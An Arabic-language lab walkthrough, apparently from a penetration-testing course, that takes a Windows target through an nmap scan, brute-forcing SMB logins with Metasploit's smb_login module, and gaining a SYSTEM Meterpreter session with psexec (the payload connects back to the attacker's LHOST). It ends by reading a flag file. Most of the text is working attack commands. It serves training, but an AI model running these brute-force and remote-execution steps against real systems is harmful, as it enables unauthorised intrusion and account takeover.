🧪 المختبر 13: استغلال SMB/PSExec على Windows (باستخدام Metasploit)

🎯 الهدف الأساسي:

الحصول على جلسة Meterpreter على نظام Windows باستخدام PSExec عبر ثغرات SMB.

🔧 الأدوات المستخدمة: nmap, service postgresql start, msfconsole, auxiliary/scanner/smb/smb_login, exploit/windows/smb/psexec, psexec.py.

📜 خطوات التنفيذ:

📊 منهجية اختبار الاختراق: الاستطلاع، الفحص، القوة الغاشمة، الاستغلال

  1. الفحص واكتشاف خدمة SMB:

    • قم بإجراء فحص Nmap على الهدف لتحديد ما إذا كانت خدمة SMB تعمل على المنفذ 445.

    • الأمر:

      nmap -sV <Target_IP>
    • الشرح: ستظهر لك خدمة SMB تعمل على المنفذ 445.

  2. هجوم القوة الغاشمة على SMB (باستخدام Metasploit):

    • ابدأ خدمة قاعدة بيانات PostgreSQL ثم قم بتشغيل Metasploit Console.

    • الأمر:

      msfconsole -q
    • المعلومة الذهبية 💡: استخدم وحدة auxiliary/scanner/smb/smb_login لتخمين بيانات اعتماد SMB.

    • الأمر:

      use auxiliary/scanner/smb/smb_login
      show options
    • الشرح: سترى الخيارات المطلوبة لهذه الوحدة، مثل RHOSTS و USER_FILE و PASS_FILE.

    • الأمر:

      set RHOSTS <Target_IP>
      set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
      set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
      set VERBOSE false
      run
    • الشرح: إذا نفذت هذه الأوامر، ستبدأ الوحدة في تجربة مجموعات مختلفة من أسماء المستخدمين وكلمات المرور. من المتوقع أن تجد بيانات اعتماد صالحة (مثلاً administrator:quertyu).

  3. الاستغلال باستخدام PSExec (يدوي و Metasploit):

    • الوصول إلى Shell باستخدام PSExec (اليدوي):

      • استخدم سكريبت Python psexec.py (متوفر في Impacket) لتشغيل Command Shell باستخدام بيانات الاعتماد التي تم الحصول عليها.

      • الأمر:

        psexec.py administrator@<Target_IP> cmd.exe
      • الشرح: بيطلب منك كلمة المرور (quertyu). إذا أدخلتها بشكل صحيح، ستحصل على جلسة Command Shell على الهدف.

    • الوصول إلى Meterpreter باستخدام PSExec (Metasploit):

      • المعلومة الذهبية 💡: استخدم وحدة exploit/windows/smb/psexec للحصول على جلسة Meterpreter.

      • الأمر:

        use exploit/windows/smb/psexec
        show options
        set RHOSTS <Target_IP>
        set SMBUser administrator
        set SMBPass quertyu
        set LHOST <Your_Kali_IP>
        set LPORT 4444
        exploit
      • الشرح: إذا نفذت هذه الأوامر، ستقوم Metasploit بتحميل حمولة Meterpreter وتنفيذها، وستحصل على جلسة Meterpreter بامتيازات NT AUTHORITY\SYSTEM.

      • الأمر: (داخل جلسة Meterpreter)

        getuid
      • الشرح: ستؤكد أنك بامتيازات NT AUTHORITY\SYSTEM.

      • جمع العلم (Flag):

      • الأمر: (داخل جلسة Meterpreter)

        shell
        type C:\flag.txt
      • الشرح: ستعرض لك محتويات ملف flag.txt.

Last updated